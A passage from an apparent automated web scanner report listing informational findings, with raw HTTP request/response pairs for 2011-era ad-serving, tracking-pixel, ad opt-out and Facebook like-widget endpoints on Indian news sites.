Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c5db95c36674fba9b15e93c0a5317c9e; expires=Mon, 03-Sep-2012 03:27:16 GMT; path=/
Content-Length: 3393
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"05eaa309-64d4-c0a7-d349-bc1b1d68d17f",
"size":"728x90",
"floor":"0.85",
"url":"http:\/\/www.ndtv.com\/article\/india\/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917",
"channel":"oxpv1:34-632-1929-2023-5730",
"hrid":"d3844d124a1fbaa22ea27547a07f9c7f-1315106836",
"beacon":"<div id='beacon_3379a1ddaa' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=5730&amp;cb=3379a1ddaa&amp;r_id=d3844d124a1fbaa22ea27547a07f9c7f&amp;r_ts=lqzaxg' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- OAS Pass Back Tag Begins -->\r\n<script type=\"text\/javascript\">\r\n\tvar OAS_url = 'http:\/\/oasc12.247realmedia.com';\r\n\tvar OAS_sitepage = 'martinimediainc.com\/passback';\r\n\tvar OAS_pos = 'Top';\r\n\tvar OAS_query = '';\r\n\tvar OAS_exclude = '';\r\nvar OAS_RN = new String (Math.random());\r\nvar OAS_RNS = OAS_RN.substring (2,11);\r\ndocument.write('<scr' + 'ipt language=\"javascript\" type=\"text\/javascript\" src=\"' + OAS_url + '\/RealMedia\/ads\/adstream_jx.ads\/' + OAS_sitepage + '\/1' + OAS_RNS + '@' + OAS_pos + '?RM_Exclude=' + OAS_exclude + '&' + OAS_query + '\"><\/scr' + 'ipt>');\r\n<\/script>\r\n<!-- OAS Pass Back Tag Ends --><div id='beacon_3379a1ddaa' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=11613&amp;campaignid=3273&amp;zoneid=5730&amp;loc=1&amp;referer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&amp;cb=3379a1ddaa&amp;r_id=d3844d124a1fbaa22ea27547a07f9c7f&amp;r_ts=lqzaxg' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- OAS Pass Back Tag Begins -->
<script type="text/javascript">
   var OAS_url = 'http://oasc12.247realmedia.com';
   var OAS_sitepage = 'martinimediainc.com/passback';
   var OAS_pos = 'Top';
   var OAS_q
...[SNIP]...

Request 2

GET /afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030? HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc031912d45668ea5127d9d1b9b; expires=Mon, 03-Sep-2012 03:27:20 GMT; path=/
Content-Length: 3046
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"05eaa309-64d4-c0a7-d349-bc1b1d68d17f",
"size":"728x90",
"floor":"0.85",
"channel":"oxpv1:34-632-1929-2023-5730",
"hrid":"1c75978c2393c164a32c730d5e12bd13-1315106840",
"beacon":"<div id='beacon_6bd8a1fc6e' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=5730&amp;cb=6bd8a1fc6e&amp;r_id=1c75978c2393c164a32c730d5e12bd13&amp;r_ts=lqzaxk' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- OAS Pass Back Tag Begins -->\r\n<script type=\"text\/javascript\">\r\n\tvar OAS_url = 'http:\/\/oasc12.247realmedia.com';\r\n\tvar OAS_sitepage = 'martinimediainc.com\/passback';\r\n\tvar OAS_pos = 'Top';\r\n\tvar OAS_query = '';\r\n\tvar OAS_exclude = '';\r\nvar OAS_RN = new String (Math.random());\r\nvar OAS_RNS = OAS_RN.substring (2,11);\r\ndocument.write('<scr' + 'ipt language=\"javascript\" type=\"text\/javascript\" src=\"' + OAS_url + '\/RealMedia\/ads\/adstream_jx.ads\/' + OAS_sitepage + '\/1' + OAS_RNS + '@' + OAS_pos + '?RM_Exclude=' + OAS_exclude + '&' + OAS_query + '\"><\/scr' + 'ipt>');\r\n<\/script>\r\n<!-- OAS Pass Back Tag Ends --><div id='beacon_6bd8a1fc6e' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=11613&amp;campaignid=3273&amp;zoneid=5730&amp;loc=1&amp;cb=6bd8a1fc6e&amp;r_id=1c75978c2393c164a32c730d5e12bd13&amp;r_ts=lqzaxk' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- OAS Pass Back Tag Begins -->
<script type="text/javascript">
   var OAS_url = 'http://oasc12.247realmedia.com';
   var OAS_sitepage = 'martinimediainc.com/passback';
   var OAS_pos = 'Top';
   var OAS_query = '';
   var OAS_exclude = '';
var OAS_RN = new String (Math.random());
var OAS_RNS = OAS_RN.substring (2,11);
document.write('<scr' + 'ipt language="javascript" type="text/javascript" src="' + OAS_url + '/RealMedia/ads/
...[SNIP]...

20.5. http://optout.collective-media.net/optout/status  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://optout.collective-media.net
Path:   /optout/status

Request 1

GET /optout/status?nocache=0.5394382 HTTP/1.1
Host: optout.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dc=dc; nadp=1; optout=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 11:39:25 GMT
Content-Type: text/html
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0

Request 2

GET /optout/status?nocache=0.5394382 HTTP/1.1
Host: optout.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dc=dc; nadp=1; optout=1

Response 2

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

20.6. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Request 1

GET /jspix?anId=140&pubId=11479&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C73BD05297FFA8CC9F96289B5720F79; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:45 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryvuw"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",DIR:"dir"};var k=function(V,X,T){if(typeof X==="undefined"){X=H.INFO;}if(v&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&X===H.DIR){if(typeof V==="object"){for(var W in V){if(V.hasOwnProperty(W)){var R=(typeof T!=="undefined")?T+" : ":"";k(V[W],X,R+W);}}}else{try{console.log(T+": "+V);}catch(U){}}}else{try{console[X](V);}catch(S){}}}};var z=window!=top;var x=false;var g=new Date().getTime();var p=function(T,S){var R,W,V;k("Server Parameters:");k(adsafeVisParams,H.DIR);var U="Detection Results:\n\n";for(R in T){V=T[R];U+=V.key+": "+decodeURIComponent(V.val)+"\n";}k(U);U="key: \n";for(W in S){if(S.hasOwnProperty(W)){U+=W+": "+S[W]+"\n";}}k(U);};k("v"+N+", mode: "+adsafeVisParams.mode);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var L=function(){var R={};try{R.a=encodeURIComponent(top.location.href);}catch(U){}try{R.b=encodeURIComponent(parent.location.href);}catch(U){}if(z){try{R.c=encodeURIComponent(parent.document.referrer);}catch(U){}try{R.e=encodeURIComponent(window.document.referrer);}catch(U){}}try{R.d=encodeURIComponent(window.location.href);}catch(U){}try{R.f=encodeURIComponent(adsafeVisParams.jsref);}catch(U){}try{var T=h();R.g=encodeURIComponent(T.g);R.q=encodeURIComponent(T.q);}catch(U){}R=C(R);R=o(R);var S=[];for(var V in R){if(R.hasOwnProperty(V)){S.push({key:V,val:R[V]});}}S.sort(function(X,W){re
...[SNIP]...

Request 2

GET /jspix?anId=140&pubId=11479&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=238203DD4577D1AC75D71FA952A79F62; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:45 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "null",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryw8r"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",DIR:"dir"};var k=function(V,X,T){if(typeof X==="undefined"){X=H.INFO;}if(v&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&X===H.DIR){if(typeof V==="object"){for(var W in V){if(V.hasOwnProperty(W)){var R=(typeof T!=="undefined")?T+" : ":"";k(V[W],X,R+W);}}}else{try{console.log(T+": "+V);}catch(U){}}}else{try{console[X](V);}catch(S){}}}};var z=window!=top;var x=false;var g=new Date().getTime();var p=function(T,S){var R,W,V;k("Server Parameters:");k(adsafeVisParams,H.DIR);var U="Detection Results:\n\n";for(R in T){V=T[R];U+=V.key+": "+decodeURIComponent(V.val)+"\n";}k(U);U="key: \n";for(W in S){if(S.hasOwnProperty(W)){U+=W+": "+S[W]+"\n";}}k(U);};k("v"+N+", mode: "+adsafeVisParams.mode);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var L=function(){var R={};try{R.a=encodeURIComponent(top.location.href);}catch(U){}try{R.b=encodeURIComponent(parent.location.href);}catch(U){}if(z){try{R.c=encodeURIComponent(parent.document.referrer);}catch(U){}try{R.e=encodeURIComponent(window.document.referrer);}catch(U){}}try{R.d=encodeURIComponent(window.location.href);}catch(U){}try{R.f=encodeURIComponent(adsafeVisParams.jsref);}catch(U){}try{var T=h();R.g=encodeURIComponent(T.g);R.q=encodeURIComponent(T.q);}catch(U){}R=C(R);R=o(R);var S=[];for(var V in R){if(R.hasOwnProperty(V)){S.push({key:V,val:R[V]});}}S.sort(function(X,W){return(X.val.length>W.val.length)?1:(X.val.length<W.val.length
...[SNIP]...

20.7. http://timeslog.indiatimes.com/timeslog.dll/topcnt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://timeslog.indiatimes.com
Path:   /timeslog.dll/topcnt

Request 1

GET /timeslog.dll/topcnt?CHUR=timesofindia.indiatimes.com&randomno=0.052517772652208805 HTTP/1.1
Host: timeslog.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: dmid72=40790.3366260185vctr5; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 08:04:44 GMT
Set-Cookie: chid30=40790.3366260185vctr5; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 08:04:44 GMT
Set-Cookie: chid61=40790.3366260185vctr5; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 08:04:44 GMT
Set-Cookie: chid44=40790.3366260185vctr5; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 08:04:44 GMT
Expires: Mon, 08 Dec 2008 02:34:44 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /timeslog.dll/topcnt?CHUR=timesofindia.indiatimes.com&randomno=0.052517772652208805 HTTP/1.1
Host: timeslog.indiatimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:35:13 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

20.8. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Request 1

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.44.101
X-Cnection: close
Date: Sun, 04 Sep 2011 02:41:19 GMT
Content-Length: 8395

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<div id="connect_widget_4e62e54fd2ed55a19969188" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">1,403,922</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span>
...[SNIP]...

Request 2

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.46.122
X-Cnection: close
Date: Sun, 04 Sep 2011 02:41:25 GMT
Content-Length: 8346

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<div id="connect_widget_4e62e555966950067371697" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">1,403,922</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span>
...[SNIP]...

20.9. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?app_id=117787264903013&href=http%3A%2F%2Fwww.facebook.com%2FTimesofIndia&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.208.55
X-Cnection: close
Date: Sun, 04 Sep 2011 02:33:52 GMT
Content-Length: 23352

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62e390d6c764f44826889" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1M</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1M</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"383cdeef",fb_dtsg:"AQD3-NrH",no_cookies:1,lhsh:"qAQDGIoD0"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/www.facebook.com\/TimesofIndia","pageId":null,"widgetID":"connect_widget_4e62e390d6c764f44826889","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoResize":true,"connectText":0,"socia
...[SNIP]...

Request 2

GET /plugins/like.php?app_id=117787264903013&href=http%3A%2F%2Fwww.facebook.com%2FTimesofIndia&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.194.36
X-Cnection: close
Date: Sun, 04 Sep 2011 02:34:01 GMT
Content-Length: 23274

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62e3997f5327689927259" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1M</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div 